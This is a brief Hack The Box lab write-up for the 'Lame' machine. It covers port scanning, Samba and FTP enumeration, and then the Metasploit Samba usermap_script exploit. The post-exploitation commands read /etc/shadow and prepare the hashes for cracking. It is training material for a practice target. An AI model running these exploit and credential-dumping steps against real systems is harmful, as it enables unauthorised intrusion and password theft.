Lame

HTB - 2. Lame

1. nmap -A -T4 -p- 10.10.10.3 takes 144 seconds, 21 (ftp) open with version vsftpd 2.3.4 and anonymous login allowed, 22 (ssh) open with version 4.7p1 Debian 8ubuntu2, 139 & 445 (samba) open with version 3.0.20-Debian (workgroup: WORKGROUP), 3632 (distccd v1) with version 4.2.4

2. Samba

   Copy

   smbclient -L \\\\10.10.10.3\\
   exit
   smbclient -L \\\\10.10.10.3\\tmp
   exit
   smbclient -L \\\\10.10.10.3\\opt
   exit
   smbclient -L \\\\10.10.10.3\\ADMIN$

   Result: Dead end

3. FTP Check

   Copy

   ftp 10.10.10.3
   anonymous
   anonymous
   ls
   pwd

   Result: In directory / which is empty

4. Search samba 3.0.20-debian exploit: https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script and Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)

5. Metasploit Exploit

   Copy

   use exploit/multi/samba/usermap_script
   options
   set rhosts 10.10.10.3
   show targets
   exploit
   whoami
   hostname
   pwd
   ls
   updatedb
   locate root.txt
   locate user.txt
   cat /root/root.txt
   cat /home/makis/user.txt
   cat /etc/passwd
   cat /etc/shadow
   unshadow passwd shadow

   Result: Shell popped and machine owned. Can try to crack passwords with hashcat.

6. Search vsftpd 2.3.4 exploit: https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor - This is a rapithole; don't continuously try if it doesn't work